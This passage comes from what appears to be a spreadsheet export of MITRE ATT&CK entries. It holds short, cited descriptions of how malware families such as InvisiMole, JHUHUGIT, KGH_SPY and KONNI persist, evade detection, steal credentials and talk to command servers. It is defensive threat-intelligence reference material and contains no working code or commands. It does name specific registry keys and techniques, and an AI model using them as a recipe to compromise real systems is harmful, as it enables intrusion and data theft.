    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can use a .lnk shortcut for the Control Panel to establish persistence.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can collect information about installed software used by specific users, software executed on user login, and software executed by each system.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) uses variations of a simple XOR encryption routine for C&amp;C communications.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can check for artifacts of VirtualBox, Virtual PC and VMware environment, and terminate itself if they are detected.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can gather information on the mapped drives, OS version, computer name, DEP policy, memory size, and system volume serial number.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) gathers information on the IP forwarding table, MAC address, configured proxy, and network SSID.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) lists local users and session information.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can obtain running services on the victim.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) gathers the local system time from the victim’s machine.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can replace legitimate software or documents in the compromised network with their trojanized versions, in an attempt to propagate itself within the network.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) samples were timestomped by the authors by setting the PE timestamps to all zero values. [InvisiMole](https://attack.mitre.org/software/S0260) also has a built-in command to modify file times.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can remotely activate the victim’s webcam to capture content.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) uses HTTP for C2 communications.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can launch a remote shell to execute commands.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can register a Windows service named CsPower as part of its execution chain, and a Windows service named clr_optimization_v2.0.51527_X86 to achieve persistence.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[Invoke-PSImage](https://attack.mitre.org/software/S0231) can be used to embed a PowerShell script within the pixels of a PNG file.(Citation: GitHub Invoke-PSImage)</t>
  </si>
  <si>
    <t>[IronNetInjector](https://attack.mitre.org/software/S0581) has the ability to decrypt embedded .NET and PE payloads.(Citation: Unit 42 IronNetInjector February 2021 )</t>
  </si>
  <si>
    <t>[IronNetInjector](https://attack.mitre.org/software/S0581) has the ability to inject a DLL into running processes, including the [IronNetInjector](https://attack.mitre.org/software/S0581) DLL into explorer.exe.(Citation: Unit 42 IronNetInjector February 2021 )</t>
  </si>
  <si>
    <t>[IronNetInjector](https://attack.mitre.org/software/S0581) has been disguised as a legitimate service using the name PythonUpdateSrvc.(Citation: Unit 42 IronNetInjector February 2021 )</t>
  </si>
  <si>
    <t>[IronNetInjector](https://attack.mitre.org/software/S0581) can obfuscate variable names, encrypt strings, as well as base64 encode and Rijndael encrypt payloads.(Citation: Unit 42 IronNetInjector February 2021 )</t>
  </si>
  <si>
    <t>[IronNetInjector](https://attack.mitre.org/software/S0581) can identify processes via C# methods such as &lt;code&gt;GetProcessesByName&lt;/code&gt; and running [Tasklist](https://attack.mitre.org/software/S0057) with the Python &lt;code&gt;os.popen&lt;/code&gt; function.(Citation: Unit 42 IronNetInjector February 2021 )</t>
  </si>
  <si>
    <t>[IronNetInjector](https://attack.mitre.org/software/S0581) can use an IronPython scripts to load a .NET injector to inject a payload into its own or a remote process.(Citation: Unit 42 IronNetInjector February 2021 )</t>
  </si>
  <si>
    <t>[IronNetInjector](https://attack.mitre.org/software/S0581) can use IronPython scripts to load payloads with the help of a .NET injector.(Citation: Unit 42 IronNetInjector February 2021 )</t>
  </si>
  <si>
    <t>[IronNetInjector](https://attack.mitre.org/software/S0581) has used a task XML file named &lt;code&gt;mssch.xml&lt;/code&gt; to run an IronPython script when a user logs in or when specific system events are created.(Citation: Unit 42 IronNetInjector February 2021 )</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) can collect data from a local system.(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) has a command to delete a file from the machine.(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) can list file and directory information.(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) sets its own executable file's attributes to hidden.(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) can download and execute additional files.(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) has used registry values and file names associated with Adobe software, such as AcroRd32.exe.(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) can list running processes.(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) can achieve persistence by adding itself to the &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; Registry key.(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) uses custom Base64 encoding schemes to obfuscate command and control traffic in the message body of HTTP requests.(Citation: Moran 2013)(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) collects the computer name of the victim's system during the initial infection.(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) enumerates the IP address, network proxy settings, and domain name from a victim's system.(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) collects the username from the victim’s machine.(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) can list running services.(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) uses HTTP for command and control.(Citation: Moran 2013)(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) is capable of executing commands via [cmd](https://attack.mitre.org/software/S0106).(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>[JCry](https://attack.mitre.org/software/S0389) has encrypted files and demanded Bitcoin to decrypt those files. (Citation: Carbon Black JCry May 2019)</t>
  </si>
  <si>
    <t>[JCry](https://attack.mitre.org/software/S0389) has been observed deleting shadow copies to ensure that data cannot be restored easily.(Citation: Carbon Black JCry May 2019)</t>
  </si>
  <si>
    <t>[JCry](https://attack.mitre.org/software/S0389) has achieved execution by luring users to click on a file that appeared to be an Adobe Flash Player update installer. (Citation: Carbon Black JCry May 2019)</t>
  </si>
  <si>
    <t>[JCry](https://attack.mitre.org/software/S0389) has used PowerShell to execute payloads.(Citation: Carbon Black JCry May 2019)</t>
  </si>
  <si>
    <t>[JCry](https://attack.mitre.org/software/S0389) has created payloads in the Startup directory to maintain persistence. (Citation: Carbon Black JCry May 2019)</t>
  </si>
  <si>
    <t>[JCry](https://attack.mitre.org/software/S0389) has used VBS scripts. (Citation: Carbon Black JCry May 2019)</t>
  </si>
  <si>
    <t>[JCry](https://attack.mitre.org/software/S0389) has used &lt;code&gt;cmd.exe&lt;/code&gt; to launch PowerShell.(Citation: Carbon Black JCry May 2019)</t>
  </si>
  <si>
    <t>A [JHUHUGIT](https://attack.mitre.org/software/S0044) variant accesses a screenshot saved in the clipboard and converts it to a JPG image.(Citation: Unit 42 Playbook Dec 2017)</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) has used COM hijacking to establish persistence by hijacking a class named MMDeviceEnumerator and also by registering the payload as a Shell Icon Overlay handler COM object ({3543619C-D563-43f7-95EA-4DA7E1CC396A}).(Citation: ESET Sednit Part 1)(Citation: Talos Seduploader Oct 2017)</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) has exploited CVE-2015-1701 and CVE-2015-2387 to escalate privileges.(Citation: ESET Sednit Part 1)(Citation: ESET Sednit July 2015)</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) tests if it can reach its C2 server by first attempting a direct connection, and if it fails, obtaining proxy settings and sending the connection through a proxy, and finally injecting code into a running browser if the proxy method fails.(Citation: ESET Sednit Part 1)</t>
  </si>
  <si>
    <t>The [JHUHUGIT](https://attack.mitre.org/software/S0044) dropper can delete itself from the victim. Another [JHUHUGIT](https://attack.mitre.org/software/S0044) variant has the capability to delete specified files.(Citation: ESET Sednit Part 1)(Citation: Unit 42 Sofacy Feb 2018)</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) can retrieve an additional payload from its C2 server.(Citation: ESET Sednit Part 1)(Citation: Unit 42 Sofacy Feb 2018) [JHUHUGIT](https://attack.mitre.org/software/S0044) has a command to download files to the victim’s machine.(Citation: Talos Seduploader Oct 2017)</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) has registered a Windows shell script under the Registry key &lt;code&gt;HKCU\Environment\UserInitMprLogonScript&lt;/code&gt; to establish persistence.(Citation: ESET Sednit Part 1)(Citation: Talos Seduploader Oct 2017)</t>
  </si>
  <si>
    <t>Many strings in [JHUHUGIT](https://attack.mitre.org/software/S0044) are obfuscated with a XOR algorithm.(Citation: F-Secure Sofacy 2015)(Citation: ESET Sednit Part 1)(Citation: Talos Seduploader Oct 2017)</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) obtains a list of running processes on the victim.(Citation: ESET Sednit Part 1)(Citation: Unit 42 Sofacy Feb 2018)</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) performs code injection injecting its own functions to browser processes.(Citation: F-Secure Sofacy 2015)(Citation: Unit 42 Sofacy Feb 2018)</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) has used a Registry Run key to establish persistence by executing JavaScript code within the rundll32.exe process.(Citation: ESET Sednit Part 1)</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) is executed using rundll32.exe.(Citation: F-Secure Sofacy 2015)(Citation: Talos Seduploader Oct 2017)</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) has registered itself as a scheduled task to run each time the current user logs in.(Citation: ESET Sednit Part 1)(Citation: ESET Sednit July 2015)</t>
  </si>
  <si>
    <t>A [JHUHUGIT](https://attack.mitre.org/software/S0044) variant takes screenshots by simulating the user pressing the "Take Screenshot" key (VK_SCREENSHOT), accessing the screenshot saved in the clipboard, and converting it to a JPG image.(Citation: Unit 42 Playbook Dec 2017)(Citation: Talos Seduploader Oct 2017)</t>
  </si>
  <si>
    <t>A [JHUHUGIT](https://attack.mitre.org/software/S0044) variant encodes C2 POST data base64.(Citation: Unit 42 Playbook Dec 2017)</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) obtains a build identifier as well as victim hard drive information from Windows registry key &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum&lt;/code&gt;. Another [JHUHUGIT](https://attack.mitre.org/software/S0044) variant gathers the victim storage volume serial number and the storage device name.(Citation: ESET Sednit Part 1)(Citation: Unit 42 Sofacy Feb 2018)</t>
  </si>
  <si>
    <t>A [JHUHUGIT](https://attack.mitre.org/software/S0044) variant gathers network interface card information.(Citation: Unit 42 Playbook Dec 2017)</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) variants have communicated with C2 servers over HTTP and HTTPS.(Citation: ESET Sednit Part 1)(Citation: Unit 42 Sofacy Feb 2018)(Citation: Unit 42 Playbook Dec 2017)</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) uses a .bat file to execute a .dll.(Citation: Talos Seduploader Oct 2017)</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) has registered itself as a service to establish persistence.(Citation: ESET Sednit Part 1)</t>
  </si>
  <si>
    <t>A [JPIN](https://attack.mitre.org/software/S0201) variant downloads the backdoor payload via the BITS service.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can lower security settings by changing Registry keys.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201)'s installer/uninstaller component deletes itself if it encounters a version of Windows earlier than Windows XP or identifies security-related processes running.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can communicate over FTP.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can enumerate drives and their types. It can also change file permissions using cacls.exe.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can download files and upgrade itself.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) contains a custom keylogger.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can obtain the permissions of the victim user.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can send email over SMTP.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>A [JPIN](https://attack.mitre.org/software/S0201) uses a encrypted and compressed payload that is disguised as a bitmap within the resource section of the installer.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can list running processes.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can inject content into lsass.exe to load a module.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can enumerate Registry keys.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) checks for the presence of certain security-related processes and deletes its installer/uninstaller component if it identifies any of them.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can obtain system information such as OS version and disk space.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can obtain network information, including DNS, IP, and proxies.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can obtain the victim user name.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can list running services.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can use the command-line utility cacls.exe to change file permissions.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[Janicab](https://attack.mitre.org/software/S0163) captured audio and sent it out to a C2 server.(Citation: f-secure janicab)(Citation: Janicab)</t>
  </si>
  <si>
    <t>[Janicab](https://attack.mitre.org/software/S0163) used a valid AppleDeveloperID to sign the code to get past security restrictions.(Citation: Janicab)</t>
  </si>
  <si>
    <t>[Janicab](https://attack.mitre.org/software/S0163) used a cron job for persistence on Mac devices.(Citation: Janicab)</t>
  </si>
  <si>
    <t>[Janicab](https://attack.mitre.org/software/S0163) captured screenshots and sent them out to a C2 server.(Citation: f-secure janicab)(Citation: Janicab)</t>
  </si>
  <si>
    <t>[Javali](https://attack.mitre.org/software/S0528) can use large obfuscated libraries to hinder detection and analysis.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Javali](https://attack.mitre.org/software/S0528) can capture login credentials from open browsers including Firefox, Chrome, Internet Explorer, and Edge.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Javali](https://attack.mitre.org/software/S0528) can use DLL side-loading to load malicious DLLs into legitimate executables.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Javali](https://attack.mitre.org/software/S0528) can read C2 information from Google Documents and YouTube.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Javali](https://attack.mitre.org/software/S0528) can download payloads from remote C2 servers.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Javali](https://attack.mitre.org/software/S0528) has achieved execution through victims opening malicious attachments, including MSI files with embedded VBScript.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Javali](https://attack.mitre.org/software/S0528) has achieved execution through victims clicking links to malicious websites.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Javali](https://attack.mitre.org/software/S0528) has used the MSI installer to download and execute malicious payloads.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Javali](https://attack.mitre.org/software/S0528) can monitor processes for open browsers and custom banking applications.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Javali](https://attack.mitre.org/software/S0528) has been delivered as malicious e-mail attachments.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Javali](https://attack.mitre.org/software/S0528) has been delivered via malicious links embedded in e-mails.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Javali](https://attack.mitre.org/software/S0528) has used embedded VBScript to download malicious payloads from C2.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[KARAE](https://attack.mitre.org/software/S0215) can use public cloud-based storage providers for command and control.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[KARAE](https://attack.mitre.org/software/S0215) was distributed through torrent file-sharing websites to South Korean victims, using a YouTube video downloader application as a lure.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[KARAE](https://attack.mitre.org/software/S0215) can upload and download files, including second-stage malware.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[KARAE](https://attack.mitre.org/software/S0215) can collect system information.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[KEYMARBLE](https://attack.mitre.org/software/S0271) has the capability to delete files off the victim’s machine.(Citation: US-CERT KEYMARBLE Aug 2018)</t>
  </si>
  <si>
    <t>[KEYMARBLE](https://attack.mitre.org/software/S0271) has a command to search for files on the victim’s machine.(Citation: US-CERT KEYMARBLE Aug 2018)</t>
  </si>
  <si>
    <t>[KEYMARBLE](https://attack.mitre.org/software/S0271) can upload files to the victim’s machine and can download additional payloads.(Citation: US-CERT KEYMARBLE Aug 2018)</t>
  </si>
  <si>
    <t>[KEYMARBLE](https://attack.mitre.org/software/S0271) has a command to create Registry entries for storing data under &lt;code&gt;HKEY_CURRENT_USER\SOFTWARE\Microsoft\WABE\DataPath&lt;/code&gt;.(Citation: US-CERT KEYMARBLE Aug 2018)</t>
  </si>
  <si>
    <t>[KEYMARBLE](https://attack.mitre.org/software/S0271) can obtain a list of running processes on the system.(Citation: US-CERT KEYMARBLE Aug 2018)</t>
  </si>
  <si>
    <t>[KEYMARBLE](https://attack.mitre.org/software/S0271) can capture screenshots of the victim’s machine.(Citation: US-CERT KEYMARBLE Aug 2018)</t>
  </si>
  <si>
    <t>[KEYMARBLE](https://attack.mitre.org/software/S0271) uses a customized XOR algorithm to encrypt C2 communications.(Citation: US-CERT KEYMARBLE Aug 2018)</t>
  </si>
  <si>
    <t>[KEYMARBLE](https://attack.mitre.org/software/S0271) has the capability to collect the computer name, language settings, the OS version, CPU information, disk devices, and time elapsed since system start.(Citation: US-CERT KEYMARBLE Aug 2018)</t>
  </si>
  <si>
    <t>[KEYMARBLE](https://attack.mitre.org/software/S0271) gathers the MAC address of the victim’s machine.(Citation: US-CERT KEYMARBLE Aug 2018)</t>
  </si>
  <si>
    <t>[KEYMARBLE](https://attack.mitre.org/software/S0271) can execute shell commands using cmd.exe.(Citation: US-CERT KEYMARBLE Aug 2018)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) can collect credentials from WINSCP.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) has the ability to steal data from the Chrome, Edge, Firefox, Thunderbird, and Opera browsers.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) can send a file containing victim system information to C2.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) can decrypt encrypted strings and write them to a newly created folder.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) can exfiltrate collected information from the host to the C2 server.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) can enumerate files and directories on a compromised host.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) has the ability to download and execute code from remote servers.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) can perform keylogging by polling the &lt;code&gt;GetAsyncKeyState()&lt;/code&gt; function.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) can save collected system information to a file named "info" before exfiltration.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) can harvest data from mail clients.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) has the ability to set the &lt;code&gt;HKCU\Environment\UserInitMprLogonScript&lt;/code&gt; Registry key to execute logon scripts.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) has been spread through Word documents containing malicious macros.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) has masqueraded as a legitimate Windows tool.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) has used encrypted strings in its installer.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) can execute PowerShell commands on the victim's machine.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) can collect information on installed applications.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) can collect drive information from a compromised host.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) can send data to C2 with HTTP POST requests.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) has the ability to set a Registry key to run a cmd.exe command.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>Windows Credential Manager</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) can collect credentials from the Windows Credential Manager.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KOMPROGO](https://attack.mitre.org/software/S0156) is capable of retrieving information about the infected system.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>[KOMPROGO](https://attack.mitre.org/software/S0156) is capable of creating a reverse shell.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>[KOMPROGO](https://attack.mitre.org/software/S0156) is capable of running WMI queries.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) bypassed UAC with the “AlwaysNotify” settings.(Citation: Medium KONNI Jan 2020)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) had a feature to steal data from the clipboard.(Citation: Talos Konni May 2017)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) has modified ComSysApp service to load the malicious DLL payload.(Citation: Medium KONNI Jan 2020)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) has duplicated the token of a high integrity process to spawn an instance of cmd.exe under an impersonated user.(Citation: Medium KONNI Jan 2020)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) can steal profiles (containing credential information) from Firefox, Chrome, and Opera.(Citation: Talos Konni May 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">[KONNI](https://attack.mitre.org/software/S0356) has used certutil to download and decode base64 encoded strings.(Citation: Medium KONNI Jan 2020) </t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) has used FTP to exfiltrate reconnaissance data out.(Citation: Medium KONNI Jan 2020)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) can delete files.(Citation: Talos Konni May 2017)</t>
  </si>
  <si>
    <t>A version of [KONNI](https://attack.mitre.org/software/S0356) searches for filenames created with a previous version of the malware, suggesting different versions targeted the same victims and the versions may work together.(Citation: Talos Konni May 2017)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) can download files and execute them on the victim’s machine.(Citation: Talos Konni May 2017)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) has the capability to perform keylogging.(Citation: Talos Konni May 2017)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) creates a shortcut called "Anti virus service.lnk" in an apparent attempt to masquerade as a legitimate file.(Citation: Talos Konni May 2017)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) has modified registry keys of ComSysApp service and Svchost on the machine to gain persistence.(Citation: Medium KONNI Jan 2020)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) used PowerShell to download and execute a specific 64-bit version of the malware.(Citation: Talos Konni May 2017)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) has used tasklist.exe to get a snapshot of the current processes’ state of the target machine.(Citation: Medium KONNI Jan 2020)</t>
  </si>
  <si>
    <t>A version of [KONNI](https://attack.mitre.org/software/S0356) drops a Windows shortcut into the Startup folder to establish persistence.(Citation: Talos Konni May 2017)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) has used Rundll32 to execute its loader for privilege escalation purposes.(Citation: Medium KONNI Jan 2020)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) can take screenshots of the victim’s machine.(Citation: Talos Konni May 2017)</t>
  </si>
  <si>
    <t>A version of [KONNI](https://attack.mitre.org/software/S0356) drops a Windows shortcut on the victim’s machine to establish persistence.(Citation: Talos Konni May 2017)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) has used a custom base64 key to encode stolen data before exfiltration.(Citation: Medium KONNI Jan 2020)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) can gather the OS version, architecture information, connected drives, hostname, and computer name from the victim’s machine and has used systeminfo.exe to get a snapshot of the current system state of the target machine.(Citation: Talos Konni May 2017)(Citation: Medium KONNI Jan 2020)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) can collect the IP address from the victim’s machine.(Citation: Talos Konni May 2017)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) can collect the username from the victim’s machine.(Citation: Talos Konni May 2017)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) has used HTTP for C2.(Citation: Talos Konni May 2017)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) has used cmd.exe execute arbitrary commands on the infected host across different stages of the infection change.(Citation: Talos Konni May 2017)(Citation: Medium KONNI Jan 2020)</t>
  </si>
  <si>
